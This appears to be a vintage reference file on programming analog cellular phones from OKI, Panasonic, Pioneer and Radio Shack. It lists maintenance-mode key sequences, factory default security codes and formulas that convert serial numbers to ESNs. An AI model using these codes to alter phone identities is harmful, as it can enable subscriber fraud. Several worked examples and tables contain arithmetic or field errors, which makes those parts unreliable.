              Programmer:  Handset
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes (129 + 00 + Last 6 digit of serial #)
    Stamped Model Number:  UM9023
      Number of Channels:  832

Program Sequence:  % First Time Programming %
                   Power Off
                   Power On
                   Press and hold RCL and MENU keys simultaneously once
                    wake tone has stopped
                   Release depressed keys and enter Password *12345678#
                   "Enter New Pw & STO" will display
                    (Recommeded number 1234567890)
                   Enter Password + STO
                   Re-enter Password + STO
                   Phone automatically steps to Program Mode

Programming Sequence:  % Use Phone %
                       Power Off
                       Power On
                       Press and hold RCL and MENU keys simultaneously once
                        wake tone has stopped
                       Release depressed keys and enter Password
                       (Enter Password within 30 seconds)
                       ESN and Serial Number will display
                       SSN display (N/A) Press CLR to increment
                       SPD Dial displays - Press * to clear or CLR to increment
                       Default Data displays - Press * to clear or CLR to
                       Power ON "Message" and "Enter Alpha" will display
                       Press CLR to exit or enter alpha message to display
                        during power up of phone NAM 1 program appears (Press
                        VOL Down to select NAM 2)
                       Enter Data for each step + STO + VOL Down to increment
                       Once data has been entered, the NAM information
                        can be scrolled with the VOL Up or Down Key
                       Press CLR to exit Program mode

               Mobile Number:  10   XXX-XXX-XXXX
                   System ID:  5    XXXXX
      Initial Paging Channel:  4    0333 or 0334
             Access Overload:  2    XX
                    Group ID:  2    XX
                 Unlock Code:  4    XXXX
            Station Class(4):  4    1000
                  Options(3):  4    1101
               Security Code:  6    XXXXXX

(3) Options:   MIN Options   Local Use   Audio Mute   Horn Alert
                    1            1           0             1

(4) Enter Station Class in Binary (1000b = 08d)

New Unlock Code:  FUNC + 16 + 6 digit security code (NAM) +
 new 4 digit Unlock code + *

System Select:  MENU + or ("Until Adm. Menu" displays) + RCL +
 6 digit security code + (Until Current Selection Displays)
 + RCL (To view choices) + STO + CLR (To Exit)

For Only SID:  STO + 5 digit System Identification + STO
 + CLR + CLR (to exit)

                              OKI 900 Portable
                NAM Type:  EEPROM
            Manufacturer:  OKI
              Programmer:  Keypad
          ESN Prefix DEC:  129
                     HEX:  81
 ESN, S/N Match Required:  Yes (129 + last 6 digit of serial #)
     Stamped Code Number:  UM9022
      Number of Channels:  832

    Programming Sequence:
                           Program Dealer Password First
                           Press RCL and MENU keys simultaneously then
                            enter *12345678#
                           Enter 10 digit Dealer Password
                           (Recommended 1234567890)
                           Press STO to enter password into memory
                           Unit will request you enter password again
                           Enter programmed Dealer Password and press STO

Programming the Phone
                           Power On
                           Press MENU and RCL simultaneously then release
                           Enter Dealer Password
                           (Password must be entered within 30 seconds of Power
                           Software Version and ESN (In Hex) will display
                           "Spd Dial Mem Clear" then "To Reset Press *"
                            will display
                           Press * to Clear Memory Locations
                           (or CLR to pass this step)
                           "Default Data Set" then "To Reset Press *"
                            will display
                           "Press * to rest phone options (or CLR to pass
                            this step)
                           "Power On" will display for 2 seconds then
                           "Enter Alpha" shows. Enter 8 letters maximum
                            then STO step to NAM programming "NAM 1" then "OWN#"
                            will display.
                           After each parameter is entered, press STO to enter
                            data then VOL Down to increment
                           Press CLR to exit (This also allows access to NAMs
                           Repeatedly press CLR to exit Program Mode

                       # of Digits
           Mobile Number:  10   XXX-XXX-XXXX + STO + VOL Down
               System ID:  5    XXXXX + STO + VOL Down
  Initial Paging Channel:  4    0333 or 0334 + STO + VOL Down
         Access Overload:  2    XX + STO + VOL Down
                Group ID:  2    XX + STO + VOL Down
             Unlock Code:  4    XXXX + STO + VOL Down
           Station Class:  4    1010 (10d) + STO + VOL Down
              Options(1):  4    11X0 + STO + VOL Down
           Security Code:  6    XXXXXX + STO + VOL Down

(1) Options:  MIN Option   Local Use   Handsfree   Not Used
 (0=Disabled)     1            1         0 or 1        0

% Programming NAMs 2-5 %

    Programming Sequence:  Press CLR after Programming NAM 1
                           Enter Mobile Number #2 + STO + VOL Down
                           Enter System ID #2 + STO + VOL Down
                           Enter Intial Paging channel #2 + STO + VOL Down
                           Enter Access Overload #2 + STO + VOL Down
                           Enter Group ID #2 + STO + VOL Down
                           Press CLR to exit and program NAMs #3-#5
                           Repeat above steps to program NAMs #3-#5
                           Press CLR again to exit Program Mode

         New Unlock Code:  MENU + VOL Down + VOL Down etc...
                           (until "Adm.Menu" displays) + RCL + 6 digit security
                           code (NAM) + VOL Down + VOL Down + VOL Down ("Unlock
                           Code Set" and "Current Unlock Code" will display) + Ente
                            new 1-8 digit Unlock Code + STO + CLR (To exit)

           System Select:  MENU + VOL Down + VOL Down + etc... (Until "Adm.Menu"
                            displays) + RCL + 6 digit security code (NAM) + VOL
                            Down + VOL Down (Until Current Status displays) +
                            RCL + RCL + RCL (To scroll choices) + STO + CLR
                            (to exit)
                                  Pref A
                                  Pref B
                                  A Only
                                  B Only
                                  Only SID

Press STO to enter selection
Press CLR to exit

             PANASONIC CM/TF 800 (EB2502/EB2503, EBC20/EBC30)
                NAM Type:  EEPROM
            Manufacturer:  PANASONIC
              Programmer:  Keypad
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Requires Conversion (See Conversion Instructions)
     Stamped Mode Number:  EB-2502 or EB-2503
      Number of Channels:  832

    Programming Sequence:  Install fully charge battery
                           Power On
  Enter Maintenance Mode:  * + 0 + # + 0 + * + 0 + # + 0
                           Enter * + 1 + SND (to program NAM 1) or * + 2 +
                            SND (to program NAM 2)
                           NAM 1 must be programmed before NAM 2 can
                            be programmed. When programming NAM 2 only use
                            steps 01-06
                           The sequence * + 0 + # + 0 + * + 0 + # + 0 + 1
                            must be entered within 10 seconds of power up
                           Enter parameter information + STO and then the
                           Step Numnber (i.e., to program System ID, XXXXX
                            + STO + 01)
                           To recal any information already programmed into
                            phone, press RCL + Step Number
                           Press STO + * + * to write NAM information
                           Press END or * + 4 to exit Maintenance Mode

Step                       # of Digits
01                  System ID:  5    XXXXX
02              Mobile Number:  10   XXX-XXX-XXXX
03           Preferred System:  1    0(B) ot 1(A)
04       Initial Page Channel:  3    333 or 334
05            Access Overload:  2    XX
06                   Group ID:  2    XX
07           Digit Dial Limit:  2    00=32 digits
08              Station Class:  2    XX
09          Speed Dial Number:  12   XXXXXXXXXXXX
10                  Lock Code:  2-4  XX, XXX or XXXX
11     Option Bits (FCN 1)(1):  8    1100-0000
12     Option Bits (FCN 2)(2):  8    0001-0100
13     Option Bits (FCN 3)(3):  8    1111-0111

(1) Step 11: Local   MIN   Not    Not    Horn   Radio   Not
 (0=Disabled) Use    Opt   Used   Used   Alert  Mute    Used

(2) Step 12: Not    Built-in   Auto   Full   Not   A/B    Pref   Home
 (0=Disabled)Used   Monitor    Lock   Lock   Used  Select Only   Only

(3) Step 13: Call in  DTMF     Not   Dial  Not   Cumulative   Resettable  Indiv
  (0=65 ms)  Absence  Interval Used  Lock  Used  Timer        Timer       Timer

Conversion of EB-2502 and EB-2503 serial number to ESN
 (for serial numbers over 1,000,000)

(Last 6 digits of stamped Serial Number) + [(7th digit)
(262,144)]=ESN without prefix

                Example #1:  Serial Number on phone is 1,234,567
                             234,567 + [(1)(262,144)] = (496,711)
                             This phone's ESN is 13600496711

                Example #2:  Serial Number on phone is 3,234,567
                             234,567 + [(3)(262,144)]=(1,020,999)
                             This phone's ESN is 13601020999

               Display ESN:  Install Test Cable (Part #WWG18965BA)
                             Enter Maintenance Mode:  * + 0 + 0 + 0 + 0 + 0 + #
                             Press * + 3 + SND
                             Enter 1 + 1 + SND
                             ESN will display in decimal. Since the display
                              shows 10 digits maximun, first digit of the prefix
                              (136) is hidden)

           New Unlock Code:  NAM
       Multiple NAM Select:  F + 8
             System Select:  F + 7 + X
                                 X=1  Standard (AB or BA)
                                 X=2  A Only
                                 X=3  B Only
                                 X=4  Home

               PANASONIC EB-500, CM-500, TP-500, EB-T10, EB-C10
                NAM Type:  EEPROM
            Manufacturer:  PANASONIC
              Programmer:  Handset with PANASONIC programming adaptor
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Yes, requires conversion if serial
                           number is over 1,000,000 (See Conversion bellow)
    Handset Programmable:  Yes, with adaptor
      Number of Channels:  832

    Programming Sequence:  Connect programming adaptor to transceiver
                           and 12 volts power supply Connect handset directly
                            to transceiver
                           Enter the following code:  * + 0 + 0 + 0 + 0 + #
                            (to enter maintenance mode) * + 1 + SND (to
                            program NAM #1) or * + 2 + SND (to program NAM #2)
                           NAM #1 must be programmed before NAM 2 can be
                            input "In Use" and "No Svc" will illuminate if
                            improper data has been input
                           Enter individual data then press STO and the correct
                           2 digit location
                           Press STO + * + * to program NAM
                           (Press NAM to exit)

% Program NAM 1 %

Step                         # of Digits
01                    System ID:  5    XXXXX
02                 Mobile Numer:  10   XXX-XXX-XXXX
03             Preferred System:  1    0 (B) or 1 (A)
04       Initial Paging Channel:  3    333 or 334
05              Access Overload:  2    XX
06                     Group ID:  2    XX
07  Dialed Digit Limit (00 for 32,
          29 for 29, 28 for 28):  2    00
08                Station Class:  2    08
09  Frequently Dialed
            Number for Location:  10   XXX-XXX-XXX
10                    Lock Code:  2-4  XX, XXX or XXXX
11                  Options (1):  8    11000XX0
12                  Options (2):  8    0XX101XX
13                  Options (3):  8    11010111

(1) Step 11 - Options [0=Disabled, 1=Enabled]
Local   MIN   Not   Not   Not   Horn    Radio   Not
Use     Opt   Used  Used  Used  Alert   Mute    Used

(2) Step 12 - Options [0=Disabled, 1=Enabled]
Not   Built-in   Auto   Full   Not    A/B     Pref   Home
Used  Monitor    Lock   Lock   Used   Select  Only   Only

(3) Step 13 - Options [0=65 milliseconds, 1=Continuous]
Call in   DTMF      Not   Dial   Not   Cumulative  Resettable  Indiv
Absence   Interval  Used  Lock   Used  Timer       Timer       Timer

% Programming NAM 2 %

Step                        # of Digits
01                 System ID 2:  10   XXX-XXX-XXXX
02             Mobile Number 2:  5    XXXXX
03          Preferred System 2:  1    0 (B) or 1 (A)
04      Initial Paging Channel:  3    333 or 334
05           Access Overload 2:  2    XX
06                  Group ID 2:  2    XX

The following two command sequences cause phone to exit maintenance mode.

        STO + * + * (To store programmed information)
        STO + # + # (No programmed information will be saved)

% Coversion of EB-500 serial number to ESN %
  [for serial numbers 1,000,000 to 1,999,999]

(Stamped Serial Number)-(1,000,000) + (262,144) = ESN without prefix

Example:  Serial Number is 1,234,567
          (1,234,567) - (1,000,000) + (262,144) = (496,711)
          The phone's ESN is 13600496711

% For serial numbers 2,000,000 to 2,999,999 %

 (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix

% For serial numbers 3,000,000 to 3,999,999 %

 (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix

        Display ESN:  Insert Program Adaptor
                      Enter Maitenance Mode:  * + 0 + 0 + 0 + 0 + #
                      Press * + 3 + SND
                      Enter 1 + 1 + SND
                      ESN will display in decimal. Since the display
                       shows 10 digits maximum, first digit of the
                       prefix (136) is hidden. Press CHK to see the
                       missing "1"

         Horn Alert:  F + 4 + 2
    New Unlock Code:  NAM
      System Select:  F + 7 + X
                         X=1  AB or BA Standard
                         X=2  A Only
                         X=3  B Only
                         X=4  Home

% Conversion of EB-500 serial number to ESN %
  [For serial numbers 1,000,000 to 1,999,999]

(Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix

Example:  Serial Number is 1,234,567
          (1,234,567) = (1,000,000) + (262,144) = (496,711)
          This phone's ESN is 13600496711

% For serial numbers 2,000,000 to 2,999,999 %

 (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix

% For serial numbers 3,000,000 to 3,999,999 %

 (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix

        Display ESN:  Insert Program Adaptor
                      Enter Maintenance Mode:  * + 0 + 0 + 0 + 0 + #
                      Press * + 3 + SND
                      Enter 1 + 1 + SND
 ESN will display in decimal. Since the display shows 10 digits maximin,
 first digit of the prefix (136) is hidden. Press CHK to see the missing "1"

         Horn Alert:  F + 42
    New Unlock Code:  NAM
      System Select:  F + 7 + X
                         X=1  AB or BA Standard
                         X=2  A Only
                         X=3  B Only
                         X=4  Home

                        PANASONIC EB 3500 Portable
                NAM Type:  EEPROM
            Manufacturer:  PANASONIC
              Programmer:  Keypad with PANASONIC adaptor (Part #WWG1036A)
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Requires Conversion (See Conversion)
    Handset Programmable:  Yes, provided programming adaptor is availabe
      Number of Channels:  832

    Programming Sequence:  Install fully charged battery and programming adaptor
                           Power On
                           Enter Maintenance Mode:  * + 0 + 0 + 0 + 0 + #
                           Enter * + 1 + SND (to program NAM 1) or * + 2
                            + SND (to program NAM 2) NAM 1 must be
                            programmed before NAM 2 can be programmed.
                           When programming NAM 2 only use steps (01-06)
                           Enter parameter information + STO and then the
                           Step # (i.e., to program System ID, XXXXX + STO + 01)
                           To recall any information already programmed into
                            phone, press RCL + Step Number
                           Press STO + * + * to write NAM information
                           Press STO + * + 4 to exit Maintenance mode

Step                  # of Digits
01             System ID:  5    XXXXX
02         Mobile Number:  10   XXX-XXX-XXXX
03      Preferred System:  1    0(B) or 1(A)
04  Initial Page Channel:  3    333 or 334
05       Access Overload:  2    XX
06              Group ID:  2    XX
07    Digital Dial Limit:  2    00=32 digits.
08         Station Class:  2    XX
09     Speed Dial Number:  12   XXXXXXXXXXXX
10             Lock Code:  2-4  XX, XXX or XXXX
11    Options (FCN 1)(1):  8    1101X000
12    Options (FCN 2)(2):  8    0XXX0XXX
13    Options (FCN 3)(3):  8    XXXX0111

Step 11:
Local   MIN   Not   End-to   Ringer   Not   Not   Not
Use     Opt   Used  End      Silence  Used  Used  Used

Step 12:
Not     Monitor   Auto   Full   Not   A/B     Pref    Home
Used    Svc Only  Lock   Lock   Used  Select  Only    Only

Step 13:
Call in   DTMF      Send   Dial   Not   Cumulative  Resettable  Indiv
Absence   Interval  Lock   Lock   Used  Timer       Timer       Timer

% Conversion of EB-3500 serial number to ESN %
  [For serial numbers 1,000,000 to 1,999,999]

(Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix

Example:  Serial Number is 1,234,567
          (1,234,567) = (1,000,000) + (262,144) = (496,711)
          This phone's ESN is 13600496711

% For serial numbers 2,000,000 to 2,999,999 %

 (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix

% For serial numbers 3,000,000 to 3,999,999 %

 (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix

        Display ESN:  Insert Program Adaptor
                      Enter Maintenance Mode:  * + 0 + 0 + 0 + 0 + #
                      Press * + 3 + SND
                      Enter 1 + 1 + SND
 ESN will display in decimal. Since the display shows 10 digits maximin,
 first digit of the prefix (136) is hidden. Press CHK to see the missing "1"

    New Unlock Code:  NAM
Multiple NAM Select:  F + 8
      System Select:  F + 7 + X
                         X=1  Standard AB or BA
                         X=2  A Only
                         X=3  B Only
                         X=4  Home

            PANASONIC HP600 (EB-3510), EBH-30 (EB-3511) Portables
                NAM Type:  EEPROM
            Manufacturer:  PANASONIC
              Programmer:  Keypad with PANASONIC adaptor (Part #EB-X0754)
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Requires Conversion (See Conversion)
    Handset Programmable:  Yes, provided programming adaptor is
                            available or phone was manufactured after March 1,
      Number of Channels:  832

Determine Phone's manufacturer date by checking the lable on the
back of portable. The lable shows 3 letters. The first letter is
the year (A=91,B=92, etc). The second letter shows the month
(A=January, B=February, etc) and the third letter displays the
manufacturer bach. A phone with label ACX was manufactured in
March 1991

    Programming Sequence:  Install fully charged battery and
                           programing adaptor if necessary.
                           Power On
                           Pre 3/91 Models:  Enter Maintenance Mode:
                            * + 0 + 0 + 0 + 0 + #
        Post 3/91 Models:  Enter Maintenance Mode:  * + 0 + # + 0 + * + 0

                      # of Digits
               System ID:  5    XXXXX
    Mobile Number Number:  10   XXX-XXX-XXXX
        Preferred System:  1    0(B) or 1(A)
    Initial Page Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
         Digit Dial Limt:  2    00=32 digits
           Station Class:  2    XX
       Speed Dial Number:  12   XXXXXXXXXXXX
               Lock Code:  2-4  XX, XXX or XXXX
      Options (FCN 1)(1):  8    11001000
      Options (FCN 2)(2):  8    00010100
      Options (FCN 3)(3):  8    11110111

Step 11:
Local   MIN   Not   Not   Ringer   Not   Not   Not
Use     Opt   Used  Used  Silence  Used  Used  Used

Step 12:
Not   Built-in   Auto   Full   Not   A/B     Pref   Home
Used  Monitor    Lock   Lock   Used  Select  Only   Only

Step 13: (0=65 milliseconds, 1=Continous)
Call-in   DTMF     Send   Dial   Not   Cumulative   Resettable  Indiv
Absence  Interval  Lock   Lock   Used  Timer        Timer       Timer

% Conversion of EB-3510 serial number to ESN %
  [For serial numbers 1,000,000 to 1,999,999]

(Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix

Example:  Serial Number is 1,234,567
          (1,234,567) = (1,000,000) + (262,144) = (496,711)
          This phone's ESN is 13600496711

% For serial numbers 2,000,000 to 2,999,999 %

 (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix

% For serial numbers 3,000,000 to 3,999,999 %

 (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix

                Display ESN:  Insert Program Adaptor (PRE 3/91 Phones only)
     Enter Maintenance Mode:  * + 0 + 0 + 0 + 0 + # or
                              * + 0 + # + 0 + * + 0 + # (
                              if phone was manufacturerd after 3/91)
                              Press * + 3 + SND
                              Press 1 + 1 + SND
ESN will display in decimal. Since the display shows 10 digits maximum,
first digit of the prefix (136) is hidden. Press CHK to see the missing "1"

            New Unlock Code:  NAM
        Multiple NAM Select:  F + 8
              System Select:  F + 7 + X
                                 X=1  Standard (AB or BA)
                                 X=2  A Only
                                 X=3  B Only
                                 X=4  Home

                    PANASONIC 6106, 6110, EB311 AND EB362
                NAM Type:  EEPROM
            Manufacturer:  PANASONIC
              Programmer:  Handset with PANASONIC programming adaptor
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Yes, 6106  - No, 6110 (requires conversion)
    Handset Programmable:  Yes, provided programming adaptor is available
      Number of Channels:  666 (6106) or 832 (6110)

    Programming Sequence:  Connect programming adaptor to phone
                            and 12 volt power supply
                           Power On
                           Enter the following passwords
                           * + 0 + 0 + 0 + 0 + # (wait for 0)
                           * + 1 + SND ( wait for 1)
                           5 + 0 + SND (display will Clear)
                           Enter individual data then press STO and the
                            correct 2 digit location (i.e. 01, 02, etc)
                           Write NAM information with STO + * + *

Steps                 # of Digits
01               System ID:  4    XXXX
02           Mobile Number:  10   XXX-XXX-XXXX
03               Lock code:  3-4  XXX or XXXX
04     Frequently Dialed #:  10   XXX-XXX-XXXX
05           Station Class:  2    XX
06  Initial Paging Channel:  3    XXX
07         Access Overload:  2    XX
08                Group ID:  2    XX
09              Options(1):  8    11X11100
10              Options(2):  8    00000100
11              Options(3):  8    11000011

% Manufacturer Options %

Step 9:
Local   MIN   Preferred   EE   Rep
Use     Opt   System      Sig  Opt   Horn   N/A   N/A
 1       1    0(B)-1(A)    1    1      1     0     0

Step 10:
     Built-in   Auto               A/B   Pref Sys   Home
N/A  Monitor    Lock   N/A   N/A   Sel.  Only       Only
 0      0        0      0     0     1      0         0

Step 11: (0=65 milliseconds, 1=Continuous)
Call In    DTMF                              Total Call   Ind Call
Absense    Interval   N/A   N/A   N/A   N/A  Timer        Timer
   1          1        0     0     0     0     1            1

% Conversion of 6110 serial number to ESN %
  [For serial numbers 1,000,000 to 1,999,999]

(Stamped Serial Number) - (1,000,000) + (262,144) = ESN without prefix

Example:  Serial Number is 1,234,567
          (1,234,567) = (1,000,000) + (262,144) = (496,711)
          This phone's ESN is 13600496711

% For serial numbers 2,000,000 to 2,999,999 %

 (Stamped Serial Number) - (2,000,000) + (524,288) = ESN without prefix

% For serial numbers 3,000,000 to 3,999,999 %

 (Stamped Serial Number) - (3,000,000) + (786,432) = ESN without prefix

                Horn Alert:  F + 4 + 4
           New Unlock Code:  NAM
             System Select:  F + X
                                 X=7  Home
                                 X=8  B Only
                                 X=9  A Only
                                 X=#  BA or AB

                         PANASONIC 6104EA & 6104EC
                NAM Type:  Tri-State
            Manufacturer:  PANASONIC
              Programmer:  Motorola 1801 - Celnum or Curtis
          ESN Prefex DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Disabled (Enable if equiped)
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled

        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

         Horn Alert Code:  END + # (simultaneously)
         New Unlock Code:  NAM
           System Select:  N/A

                            PANASONIC 6104EB
                NAM Type:  Tri-State
            Manufacturer:  PANASONIC
              Programmer:  Motorola 1801 - Celnum or Curtis
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Repertory Option:  Enabled
        Handsfree Option:  Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

Hex Address       B7           B0
    13            0 0 0 1 0 0 0 0
    14            0 1 0 0 0 0 1 1

Hex Address 13 - B4  A/B Select

Hex Address 14 - B6  DTMF Interval
                 B1  Total Call Timer
                 B0  Individual Call Timer

             Horn Alert:  END + # (Simultaneously)
                          New Unlock Code:  NAM
          System Select:  F + X
                            X=7  Standard AB or BA
                            X=8  Preferred Only (A or B)
                            X=9  Non-Preferred Only (B or A)

       PANASONIC 6105EA, 6105EB & 6105EX (100, 101, 102, 103, 104, 105)
                NAM Type:  Tri-State
            Manufacturer:  PANASONIC
              Programmer:  Motorola 1801 - Celnum or Curtis
          ESN Prefix DEC:  136
                     HEX:  88
 ESN, S/N Match Required:  Yes
    Programmable Handset:  No
      Available Channels:  666

     Phone Number Format:  XXX-XXX-XXXX
        Lock Code Format:  XXX
              MIN Option:  Enabled
        Reportory Option:  Enabled
        Handsfree Option:  Disabled
        Local Use Option:  Enabled
   End-to-End Signalling:  Enabled
       Horn Alert Option:  Enabled
        System ID Format:  XXXXX
        Preferred System:  A or B
   Access Overload Class:  XX
         Group ID Format:  XX
  Initial Paging Channel:  333 or 334
           Station Class:  00

Hex Address             B7           B0
    13                  0 0 0 1 1 0 0 0
    14                  1 1 0 0 0 0 1 1
    15                  1 0 0 0 0 0 0 0

Hex Address 13 - B4  A/B System Selection
                 B3  16 digit display
Hex Address 14 - B7  Received Call Indicator
                 B6  DTMF Interval
                 B1  Total Call Timer
                 B0  Individual Call Timer

Hex Address 15 - B7  Last Digit Clear

             Horn Alert:  END + # (Simultaneously)
        New Unlock Code:  NAM
          System Select:  STO + # + X
                           X=1  Standard AB or BA
                           X=2  Preferred Only (A or B)
                           X=3  Non-Preferred Only (B or A)

                       PHILIPS FM 9210 Transportable
        Requires Curtis or Bytek Programmer with Philips adaptor.

                           PIONEER PCM 300 & 500
                NAM Type:  EEPROM
            Manufacturer:  Motorola
              Programmer:  Keypad
          ESN Prefix DEC:  130
                     HEX:  82
 ESN, S/N Match Required:  No
       Stamped Model No.:  PCM 300 or PCM 500
      Available Channels:  832

        Program Sequence:  See MOTOROLA Handset Programming
                           -Use Programming Sequence #6

              Horn Alert:  N/A
         New Unlock Code:  FCN + 0 + 6 digit Security Code +
                            new 3 digit Unlock Code
           System Select:  RCL + * + * + * (to scroll choices)
                            RCL (to store selection)
                                  A Only
                                  B Only

                            PIONEER PCM 600
                NAM Type:  EEPROM
            Manufacturer:  Motorola
              Programmer:  Keypad
          ESN Prefix DEC:  130
                     HEX:  82
 ESN, S/N Match Required:  No
       Stamped Model No.:  PCM 600
      Number of Channels:  832

    Programming Sequence:  See MOTOROLA Handset Programming
                           -Use program Sequence #6

         New Unlock Code:  FCN + 0 + 6 digit Security Code +
                            new 3 digit Unlock Code
           System Select:  RCL + * + * + * (to scroll choices)
                            STO (to enter selection)
                                  A Only
                                  B Only




See MOTOROLA Handset Programming Instructions

                        RADIO SHACK CROSS REFERENCE

Radio Shack, or Tandy, products generally have to model numbers. The first is
a stamped model number, and the second is the catalog number. This list will
help identify the Radio Shack phones you mat encounter.

Stamped Model                   Marketed Model
17-1002                         17-1002 Transportable
17-1003                         CT200 Transportable
17-1005                         CT201 Transportable
17-1006                         CT1033 Transportable (See NOKIA-MOBIRA LX-11)
17-1050                         CT301 Portable
17-1051                         CT302 Portable (See NOKIA-MOBIRA P4000 & PT612)
17-1075                         CT101 Mobile
17-1076                         CT102 (See NOKIA-MOBIRA LX-11)
17-2001                         CT300 Portable
17-3001                         CT100 Mobile
17-8003                         Canadian Product
TC1000                          ENTREPRENUER (See Radio Shack CT300 & CT301)

                          RADIO SHACK CT102

                RADIO SHACK CT1033 Transportable (17-1006)
(Requires Curtis Programmer with MOBIRA adaptor or MOBIRA serive handset)

                  RADIO SHACK CT302 Portable (17-1051)
See NOKIA MOBIRA P4000 and PT612 Portable

                        RADIO SHACK CT100 & CT101
                NAM Type:  EEPROM
            Manufacturer:  NOKIA-MOBIRA
              Programmer:  Phone Handset or Service Handset
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes, provided current unlock code
                            is known. Otherwise service handset is necessary
      Number of Channels:  CT100 - 666 Channels
                           CT101 - 832 Channels

    Programming Sequence:  Power On
  Enter Programming mode:  *17*3001*XXXX*
                            where XXXX=1234 (new phones) else
                            XXXX=current unlock code
                           SEL button to increment steps
                           Once last item is entered then phone is
                            returned to normal operation.

                      # of Digits
               System ID:  5    XXXXX
              MIN Option:  1    1
               Local Use:  1    1
            Phone Number:  10   XXX-XXX-XXXX
           Station Class:  2    XX
  Initial Paging Channel:  3    333 or 334
         Access Overload:  2    XX
                Group ID:  2    XX
               Lock Code:  4    XXXX

                         RADIO SHACK CT300 & CT301
                NAM Type:  EEPROM
            Manufacturer:  NOKIA-MOBIRA
              Programmer:  keypad or service adaptor
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes, provided security code is known,
                            otherwise test adaptor is necessary
      Number of Channels:  666 (CT300)
                           832 (CT301)

    Programming Sequence:  Power On
                           Enter access code, * + 17 + * + 2001 + * +
                            XXXXX + * where XXXXX=12345 (from factory)
                            or XXXXX=Current security code.
                           HO-Id should appear in display
                           Press SEL to enter data and increment
                           Phone automatically writes NAM information
                            upon completion of final step.

                      # of Digits
               System ID:  5    XXXXX + SEL
              MIN Option:  1    1 + SEL
               Local Use:  1    1 + SEL
           Mobile Number:  10   XXX-XXX-XXXX + SEL
   Station Class (CT301):  2    10 + SEL
    Initial Page Channel:  3    333 or 334 + SEL
         Access Overload:  2    XX + SEL
                Group ID:  2    XX + SEL
           Security Code:  5    XXXXX + SEL

         New Unlock Code:  SEL + 7 + 5 digit Security Code (current
                           Unlock code will display) + CLR + new
                           4 digit Unlock code + END
           System Select:  SEL + 1 + 1 + 1
                           One of the following prompts will display:
                            A  A Only
                            B  B Only
                            S  AB or BA
                            H  Home

Press CLR to exit

   RADIO SHACK CT200 (17-1003) Transportable & CT201 (17-1005) Transportable
                NAM Type:  EEPROM
            Manufacturer:  NOKIA-MOBIRA
              Programmer:  Handset, Service Handset or Curtis (with MOBIRA opt)
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes
    Handset Programmable:  Yes
      Number of Channels:  666

    Programming Sequence:  Enter Program Mode with the following sequence
                           * + 17 + * + 1003 + * + XXXX + *
                            XXXX=1234 (from factory)
                            XXXX=current security code
                           HO-Id should appear in display
                           Press SEL to enter data and increment
                           Phone automatically writes NAM information upon
                            completion of final step

Service Handset Instructions:
                           If using service handset, enter Local Mode
                            with:  01 + # While Noise sounds from handset
                           Enter programming mode with the following
                            sequence: 48 + #
                           Press each step number, desired parameter
                            then * to enter data
                           Example:  System ID (0 + XXXXX + *)
                           Once data has been entered, press * to exit
                           Program Mode and return to Local Mode
                           To exit Local Mode, press 02# or Power Off
                           ESN can be read in Local Mode by pressing 44#
                           ESN will display in deciman. Press * to convert
                            ESN to hex

                      # of Digits
               System ID:  5    XXXXX
              MIN Option:  1    1
               Local Use:  1    1
           Mobile Number:  10   XXX-XXX-XXXX
           Station Class:  2    00 (CT200) or 08(CT201)
    Initial Page Channel:  3    333 or 334
         Access Overload:  2    XX
        Preferred System:  1    0(B) or 1(A)
                Group ID:  2    XX
           Security Code:  4    XXXX

              Horn Alert:  SEL + 2
         New Unlock Code:  NAM
         NAM Reading Seq:  Enter Local Mode as listed above with serivce
                           Press 49# to enter NAM, reading mode.
                           To read programming values, enter step number then
                            press *
                           To exit NAM reading mode, press * and phone
                            will return to Local Mode
                           To exit Local Mode press 02 + # or power OFF
           System Select:  SEL + 1 + 1 + 1 etc (to scroll choices)
                                 S=Standard AB or BA
                                 A=A only
                                 B=B only

                     RADIO SHACK 17-8003 (Sold in Canada)
                NAM Type:  EEPROM
            Manufacturer:  NOKIA-MOBIRA
              Programmer:  Handset
          ESN Prefix DEC:  165
                     HEX:  A5
 ESN, S/N Match Required:  Yes
    Stamped Model Number:  17-8003
         Number Channels:  832

    Programming Sequence:  Power Off
                           Phone On
                           Power Phone ON while holding # and * simultaneously
                           Hold # and * until lights in top row stay
                            illuminated (ie "Roam" and "No Svc")
                           Enter Code:  57609891 (within 5 seconds)
                           Enter parameter for each step then press
